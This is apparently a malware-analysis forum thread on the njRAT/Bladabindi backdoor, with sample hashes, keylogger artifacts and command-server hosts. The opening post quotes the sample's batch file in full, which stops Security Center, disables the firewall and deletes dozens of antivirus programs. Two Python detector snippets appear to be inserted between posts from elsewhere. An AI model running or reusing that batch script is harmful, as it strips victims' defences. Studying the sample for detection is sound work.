Win32/Bladabindi (NJ RAT)

Forum for analysis and discussion about malware.
EP_X0FF
Global Moderator
Posts: 4872
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Win32/Bladabindi (NJ RAT)

Post by EP_X0FF » Thu May 30, 2013 2:12 am

MMPC description http://www.microsoft.com/security/porta ... adabindi.G

SHA256: e2dee10881ceafddf3fc8fbe16c4fc1b14898c52e34b985cd7b0ef7b531e38df
SHA1: 5af0c48c88da182d337c60c0ba1f0dd067c93df6
MD5: 4f80ed5be19fdf11d1fb27240640ba40

https://www.virustotal.com/en/file/e2de ... 369879627/

script-kiddie trash

batch included

Code:

echo off
net stop "Security Center"
netsh firewall set opmode mode=disable
del E-*
del av*
del fire*
del anti*
del spy*
del bullguard
del PersFw
del KAV*
del UfseAgnt*
del Spy*
del ZONEALARM
del SAFE***
del OUTPOST*
del nv*
del nav*
del F-*
del cle*
del BLACKICE
del def*
del kav*
del avg*
del ash*
del aswupdsv
del ewid*
del guard*
del guar*
del gcasDt*
del msmp*
del mcafe*
del mghtml
del msiexec
del *safe*
del zap*
del zauinst
del upd*
del zlclien*
del minilog
del cc*
del norton*
del norton au*
del ccc*
del npfmn*
del loge*
del nisum*
del issvc
del tmp*
del tmn*
del pcc*
del cpd*
del pop*
del pav*
del padmin
del panda*
del avsch*
del sche*
del syman*
del *virus*
del realm*
del sweep*
del scan*
del ad-*
del safe*
del avas*
del norm*
del offg*
del /Q /F %ProgramFiles%\alwils~1\avast4\*.*
del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\******
del /Q /F %ProgramFiles%\kasper~1\******
del /Q /F %ProgramFiles%\trojan~1\******
del /Q /F %ProgramFiles%\f-prot95\*.*
del /Q /F %ProgramFiles%\tbav\*.dat
del /Q /F %ProgramFiles%\avpersonal\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\Mcafee\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\avgamsr\******
del /Q /F %ProgramFiles%\avgamsvr\******
del /Q /F %ProgramFiles%\avgemc\******
del /Q /F %ProgramFiles%\avgcc\******
del /Q /F %ProgramFiles%\avgupsvc\******
del /Q /F %ProgramFiles%\grisoft
del /Q /F %ProgramFiles%\nood32krn\******
del /Q /F %ProgramFiles%\nood32\******
del /Q /F %ProgramFiles%\nod32\******
del /Q /F %ProgramFiles%\nood32\******
del /Q /F %ProgramFiles%\kav\******
del /Q /F %ProgramFiles%\kavmm\******
del /Q /F %ProgramFiles%\kaspersky\*.*
del /Q /F %ProgramFiles%\ewidoctrl\******
del /Q /F %ProgramFiles%\guard\******
del /Q /F %ProgramFiles%\ewido\******
del /Q /F %ProgramFiles%\pavprsrv\******
del /Q /F %ProgramFiles%\pavprot\******
del /Q /F %ProgramFiles%\avengine\******
del /Q /F %ProgramFiles%\apvxdwin\******
del /Q /F %ProgramFiles%\avira\******
del /Q /F %ProgramFiles%\panda software
Ring0 - the source of inspiration
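As an added defender-side example (not from the post, the sample or any project), a small heuristic that flags the three behaviours the quoted batch file shows: stopping Security Center, disabling the firewall, and a burst of del commands aimed at security-product names. The batch excerpt and the AV name stems are constructed for the example.

```python
import re

# Constructed excerpt modelled on the batch file quoted above (not the
# full script and not the sample's own file): it reproduces the three
# behaviours the scanner looks for.
SAMPLE_BATCH = """echo off
net stop "Security Center"
netsh firewall set opmode mode=disable
del av*
del kav*
del norton*
del /Q /F %ProgramFiles%\\kaspersky\\*.*
del /Q /F %ProgramFiles%\\Mcafee\\*.*
"""

# Name stems of security products that the quoted script deletes;
# compared case-insensitively against each path component or glob stem.
AV_TOKENS = ("av", "kav", "norton", "mcafe", "panda", "nod32", "kaspersky",
             "syman", "avast", "zonealarm", "outpost", "avira", "ewido")


def _targets_security_product(path):
    """True if any component of a del target starts with an AV stem."""
    for part in re.split(r"[\\/]", path):
        stem = part.lstrip("*").lower()
        if stem and any(stem.startswith(tok) for tok in AV_TOKENS):
            return True
    return False


def scan_batch(text):
    """Return which defence-evasion behaviours the script contains and
    how many del lines aim at security products."""
    findings = {"stops_security_center": False,
                "disables_firewall": False,
                "av_deletes": 0}
    for raw in text.splitlines():
        line = raw.strip().lower()
        if re.match(r'net\s+stop\s+"?security center"?', line):
            findings["stops_security_center"] = True
        elif re.match(r"netsh\s+firewall\s+set\s+opmode\s+mode=disable", line):
            findings["disables_firewall"] = True
        elif line.startswith("del ") and _targets_security_product(line.split()[-1]):
            findings["av_deletes"] += 1
    return findings


def is_av_killer(findings, min_deletes=3):
    """Verdict: tampering with Security Center or the firewall combined
    with a burst of deletes against security-product names."""
    tampers = findings["stops_security_center"] or findings["disables_firewall"]
    return tampers and findings["av_deletes"] >= min_deletes
```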

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Fri Aug 09, 2013 8:13 pm

Hi All,

This malware has an excellent key logging capability. After execution it drops the file java.exe in %temp% and creates a java.exe.tmp file where it actually stores all the key strokes from the user.

MD5 - 30E363C63AB1BA3BA87AD281E31CA223

VT link - https://www.virustotal.com/en/file/ed87 ... /analysis/

Regards,

rough_spear. ;)

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Sat Aug 17, 2013 11:16 am

Hi All,

One more sample file of this malware.

MD5 - BD1D660819EE54457794F31B8AB1FDE2

VT link - https://www.virustotal.com/en/file/4128 ... 376738064/

Regards,

rough_spear. ;)

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Sat Aug 17, 2013 12:32 pm

It seems that Bladabindi is on the prowl, one more sample.

MD5 - A47C6E1861C6935CA98185C8D5C3795A

VT link - https://www.virustotal.com/en/file/0273 ... 376742132/

Regards,

rough_spear. ;)

hx1997
Posts: 101
Joined: Sat Apr 07, 2012 12:16 am

Re: Win32/Bladabindi (NJ RAT)

Post by hx1997 » Tue Aug 20, 2013 2:27 am

8x Backdoor:MSIL/Bladabindi

TwinHeadedEagle
Posts: 72
Joined: Mon Aug 27, 2012 6:59 am

Re: Win32/Bladabindi (NJ RAT)

Post by TwinHeadedEagle » Wed Sep 04, 2013 10:17 pm

Backdoor:MSIL/Bladabindi.AA

Dropper

https://www.virustotal.com/en/file/f35a ... /analysis/

TwinHeadedEagle
Posts: 72
Joined: Mon Aug 27, 2012 6:59 am

Re: Win32/Bladabindi (NJ RAT)

Post by TwinHeadedEagle » Thu Sep 05, 2013 8:09 am

Another dropper, very low detection

https://www.virustotal.com/en/file/99ea ... /analysis/

Xylitol
Global Moderator
Posts: 1671
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Win32/Bladabindi (NJ RAT)

Post by Xylitol » Sun Dec 01, 2013 11:32 pm

https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.

patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm

Re: Win32/Bladabindi (NJ RAT)

Post by patriq » Mon Dec 02, 2013 8:49 pm

Xylitol wrote:
https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.

That's pretty funny.

Fuck anti-VM, they just gonna start putting anti-"Xyl" detection soon. Lol. :D

Good stuff as usual man.


That java.exe sample was hosted at hxxp://silver13.net/
A few more samples from the same server, attached.
Low detection rates... still some MSIL .net crap

Code:

sub.exe
560FFF8CCFA8AE563F00483659659F78

dex.exe
C5A4103DF0A10F19916CCCBB0E989D14

doc.exe
3262D5E2855FEF2C9263A47DEE2AC3A5

(from VxVault)
Thought that dex.exe (C5A4103DF0A10F19916CCCBB0E989D14) would be a Dexter sample, since you caught him on a POS machine before... but it looks like "SecureDll.dll" loading into IE address space... I think it's just formgrabber/keylogger ability. Anyone confirm?

Probable spot where key strokes are stored:

Code:

HKEY_CURRENT_USER\Software\HelperSolutions Software
"%System%\strokes.log"

Notes about the servers this "hacker" uses in this campaign:

Code:

silver13.net.		158.58.173.181 - RIPE-ERX NL
silver13.no-ip.biz.	197.15.207.77  - Agence Tunisienne Internet
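As an added triage example (not code from any poster or from the samples), this checks an exported host snapshot for the keylogger traces described in the thread: rough_spear's java.exe dropped in %temp% with a java.exe.tmp keystroke store beside it, and patriq's HelperSolutions Software registry key and %System%\strokes.log. The file and registry listings are constructed; a legitimate java.exe is included to show that the temp-directory condition keeps it out of the findings.

```python
import ntpath

# Constructed host snapshot (not from the thread's attachments): file
# paths and registry keys as an incident responder might export them.
FILES = [
    r"C:\Users\victim\AppData\Local\Temp\java.exe",
    r"C:\Users\victim\AppData\Local\Temp\java.exe.tmp",
    r"C:\Windows\System32\strokes.log",
    r"C:\Program Files\Java\jre7\bin\java.exe",   # legitimate install, must not fire
]
REG_KEYS = [
    r"HKEY_CURRENT_USER\Software\HelperSolutions Software",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
]


def triage(files, reg_keys):
    """Return (artifact, reason) pairs for the njRAT keylogger traces
    described in the thread. Matching is case-insensitive."""
    findings = []
    lowered = {f.lower(): f for f in files}   # lower-cased path -> original
    for low, orig in lowered.items():
        directory, name = ntpath.split(low)
        # java.exe is only suspicious when dropped in a temp directory;
        # the paired java.exe.tmp is where the sample stores keystrokes.
        if name == "java.exe" and directory.endswith("\\temp"):
            reason = "java.exe dropped in a temp directory"
            if ntpath.join(directory, "java.exe.tmp") in lowered:
                reason += " with java.exe.tmp keystroke store beside it"
            findings.append((orig, reason))
        elif name == "strokes.log" and directory.endswith("\\system32"):
            findings.append((orig, "keystroke log at %System%\\strokes.log"))
    for key in reg_keys:
        if key.lower().endswith("\\software\\helpersolutions software"):
            findings.append((key, "HelperSolutions Software key used by the keylogger"))
    return findings
```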

rkhunter
Posts: 1155
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation

Re: Win32/Bladabindi (NJ RAT)

Post by rkhunter » Thu Jan 16, 2014 8:12 am

